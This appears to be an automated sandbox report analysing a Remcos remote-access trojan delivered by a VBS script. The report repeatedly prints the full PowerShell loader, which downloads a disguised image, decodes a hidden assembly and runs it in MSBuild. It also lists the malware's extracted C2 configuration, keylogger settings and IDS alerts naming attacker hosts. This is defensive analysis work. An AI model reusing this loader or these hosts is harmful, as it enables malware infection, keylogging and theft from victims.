Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ProcessId: 7272, ProcessName: wscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt
                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt

                        Data Obfuscation

                        barindex
                        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\LbtytfWpvx.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7272, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetSt

                        Stealing of Sensitive Information

                        barindex
                        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 8048, TargetFilename: C:\ProgramData\remcos\logs.dat
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-19T13:19:33.562190+010020204251Exploit Kit Activity Detected5.182.211.158443192.168.2.449737TCP
                        2024-12-19T13:20:07.661170+010020204251Exploit Kit Activity Detected5.182.211.158443192.168.2.449755TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-19T13:19:33.562190+010020204241Exploit Kit Activity Detected5.182.211.158443192.168.2.449737TCP
                        2024-12-19T13:20:07.661170+010020204241Exploit Kit Activity Detected5.182.211.158443192.168.2.449755TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-19T13:19:36.355636+010020365941Malware Command and Control Activity Detected192.168.2.44973945.80.158.3023101TCP
                        2024-12-19T13:19:44.152578+010020365941Malware Command and Control Activity Detected192.168.2.44974145.80.158.3023101TCP
                        2024-12-19T13:19:45.469486+010020365941Malware Command and Control Activity Detected192.168.2.44974245.80.158.3023101TCP
                        2024-12-19T13:20:09.876442+010020365941Malware Command and Control Activity Detected192.168.2.44976145.80.158.3023101TCP
                        2024-12-19T13:20:11.629417+010020365941Malware Command and Control Activity Detected192.168.2.44976745.80.158.3023101TCP
                        2024-12-19T13:20:13.270134+010020365941Malware Command and Control Activity Detected192.168.2.44977345.80.158.3023101TCP
                        2024-12-19T13:20:15.010625+010020365941Malware Command and Control Activity Detected192.168.2.44977945.80.158.3023101TCP
                        2024-12-19T13:20:17.229063+010020365941Malware Command and Control Activity Detected192.168.2.44978545.80.158.3023101TCP
                        2024-12-19T13:20:18.440638+010020365941Malware Command and Control Activity Detected192.168.2.44978645.80.158.3023101TCP
                        2024-12-19T13:20:19.651997+010020365941Malware Command and Control Activity Detected192.168.2.44979245.80.158.3023101TCP
                        2024-12-19T13:20:20.865957+010020365941Malware Command and Control Activity Detected192.168.2.44979645.80.158.3023101TCP
                        2024-12-19T13:20:23.082460+010020365941Malware Command and Control Activity Detected192.168.2.44980345.80.158.3023101TCP
                        2024-12-19T13:20:24.290957+010020365941Malware Command and Control Activity Detected192.168.2.44980545.80.158.3023101TCP
                        2024-12-19T13:20:25.501522+010020365941Malware Command and Control Activity Detected192.168.2.44981145.80.158.3023101TCP
                        2024-12-19T13:20:26.711259+010020365941Malware Command and Control Activity Detected192.168.2.44981245.80.158.3023101TCP
                        2024-12-19T13:20:28.928161+010020365941Malware Command and Control Activity Detected192.168.2.44981845.80.158.3023101TCP
                        2024-12-19T13:20:30.201122+010020365941Malware Command and Control Activity Detected192.168.2.44982445.80.158.3023101TCP
                        2024-12-19T13:20:31.415147+010020365941Malware Command and Control Activity Detected192.168.2.44982545.80.158.3023101TCP
                        2024-12-19T13:20:32.625272+010020365941Malware Command and Control Activity Detected192.168.2.44983145.80.158.3023101TCP
                        2024-12-19T13:20:34.844715+010020365941Malware Command and Control Activity Detected192.168.2.44983745.80.158.3023101TCP
                        2024-12-19T13:20:36.120281+010020365941Malware Command and Control Activity Detected192.168.2.44984145.80.158.3023101TCP
                        2024-12-19T13:20:37.330701+010020365941Malware Command and Control Activity Detected192.168.2.44984445.80.158.3023101TCP
                        2024-12-19T13:20:38.542269+010020365941Malware Command and Control Activity Detected192.168.2.44984945.80.158.3023101TCP
                        2024-12-19T13:20:40.762616+010020365941Malware Command and Control Activity Detected192.168.2.44985645.80.158.3023101TCP
                        2024-12-19T13:20:41.971518+010020365941Malware Command and Control Activity Detected192.168.2.44985745.80.158.3023101TCP
                        2024-12-19T13:20:43.190408+010020365941Malware Command and Control Activity Detected192.168.2.44986345.80.158.3023101TCP
                        2024-12-19T13:20:44.404156+010020365941Malware Command and Control Activity Detected192.168.2.44986445.80.158.3023101TCP
                        2024-12-19T13:20:46.647066+010020365941Malware Command and Control Activity Detected192.168.2.44987145.80.158.3023101TCP
                        2024-12-19T13:20:47.858375+010020365941Malware Command and Control Activity Detected192.168.2.44987645.80.158.3023101TCP
                        2024-12-19T13:20:49.096041+010020365941Malware Command and Control Activity Detected192.168.2.44988045.80.158.3023101TCP
                        2024-12-19T13:20:50.315428+010020365941Malware Command and Control Activity Detected192.168.2.44988345.80.158.3023101TCP
                        2024-12-19T13:20:52.537715+010020365941Malware Command and Control Activity Detected192.168.2.44988945.80.158.3023101TCP
                        2024-12-19T13:21:02.774191+010020365941Malware Command and Control Activity Detected192.168.2.44989545.80.158.3023101TCP
                        2024-12-19T13:21:03.984842+010020365941Malware Command and Control Activity Detected192.168.2.44991645.80.158.3023101TCP
                        2024-12-19T13:21:05.191448+010020365941Malware Command and Control Activity Detected192.168.2.44992245.80.158.3023101TCP
                        2024-12-19T13:21:07.414461+010020365941Malware Command and Control Activity Detected192.168.2.44992845.80.158.3023101TCP
                        2024-12-19T13:21:08.656167+010020365941Malware Command and Control Activity Detected192.168.2.44993245.80.158.3023101TCP
                        2024-12-19T13:21:09.866355+010020365941Malware Command and Control Activity Detected192.168.2.44993545.80.158.3023101TCP
                        2024-12-19T13:21:11.082137+010020365941Malware Command and Control Activity Detected192.168.2.44994045.80.158.3023101TCP
                        2024-12-19T13:21:13.373486+010020365941Malware Command and Control Activity Detected192.168.2.44994645.80.158.3023101TCP
                        2024-12-19T13:21:14.586423+010020365941Malware Command and Control Activity Detected192.168.2.44994845.80.158.3023101TCP
                        2024-12-19T13:21:15.803525+010020365941Malware Command and Control Activity Detected192.168.2.44995445.80.158.3023101TCP
                        2024-12-19T13:21:17.013748+010020365941Malware Command and Control Activity Detected192.168.2.44995545.80.158.3023101TCP
                        2024-12-19T13:21:19.241202+010020365941Malware Command and Control Activity Detected192.168.2.44996145.80.158.3023101TCP
                        2024-12-19T13:21:20.453368+010020365941Malware Command and Control Activity Detected192.168.2.44996745.80.158.3023101TCP
                        2024-12-19T13:21:21.687017+010020365941Malware Command and Control Activity Detected192.168.2.44997045.80.158.3023101TCP
                        2024-12-19T13:21:22.901213+010020365941Malware Command and Control Activity Detected192.168.2.44997445.80.158.3023101TCP
                        2024-12-19T13:21:25.118678+010020365941Malware Command and Control Activity Detected192.168.2.44998045.80.158.3023101TCP
                        2024-12-19T13:21:26.330477+010020365941Malware Command and Control Activity Detected192.168.2.44998445.80.158.3023101TCP
                        2024-12-19T13:21:27.537482+010020365941Malware Command and Control Activity Detected192.168.2.44998745.80.158.3023101TCP
                        2024-12-19T13:21:28.748787+010020365941Malware Command and Control Activity Detected192.168.2.44999345.80.158.3023101TCP
                        2024-12-19T13:21:30.973972+010020365941Malware Command and Control Activity Detected192.168.2.44999945.80.158.3023101TCP
                        2024-12-19T13:21:32.189714+010020365941Malware Command and Control Activity Detected192.168.2.45000045.80.158.3023101TCP
                        2024-12-19T13:21:33.401127+010020365941Malware Command and Control Activity Detected192.168.2.45000645.80.158.3023101TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-19T13:19:34.484602+010020576351A Network Trojan was detected5.182.211.158443192.168.2.449737TCP
                        2024-12-19T13:20:08.576424+010020576351A Network Trojan was detected5.182.211.158443192.168.2.449755TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-19T13:19:38.921140+010028033043Unknown Traffic192.168.2.449740178.237.33.5080TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-19T13:19:34.484602+010028582951A Network Trojan was detected5.182.211.158443192.168.2.449737TCP
                        2024-12-19T13:20:08.576424+010028582951A Network Trojan was detected5.182.211.158443192.168.2.449755TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: rem.pushswroller.euAvira URL Cloud: Label: malware
                        Source: firewarzone.ydns.euAvira URL Cloud: Label: malware
                        Source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["rem.pushswroller.eu:23101:1", "firewarzone.ydns.eu:23101:1", "dim.remofficialws.top:23101:1", "rem.officialswvrem.top:23101:1"], "Assigned name": "NW", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmcghdzxtrswtwg-BJ2KPV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6800, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_0043293A
                        Source: MSBuild.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                        Exploits

                        barindex
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406764 _wcslen,CoGetObject,12_2_00406764
                        Source: unknownHTTPS traffic detected: 5.182.211.158:443 -> 192.168.2.4:49737 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.182.211.158:443 -> 192.168.2.4:49755 version: TLS 1.2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0040B335
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,12_2_0041B42F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_0040B53A
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,12_2_004089A9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406AC2 FindFirstFileW,FindNextFileW,12_2_00406AC2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,12_2_00407A8C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_00418C69
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,12_2_00408DA7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_00406F06

                        Software Vulnerabilities

                        barindex
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                        Networking

                        barindex
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49739 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49741 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49742 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49779 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49792 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49773 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49785 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49786 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49761 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49796 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49818 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49825 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49812 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49811 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49844 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49837 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49856 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49857 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49803 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49767 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49831 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49841 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49876 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49824 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49863 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49864 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49871 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49849 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49889 -> 45.80.158.30:23101
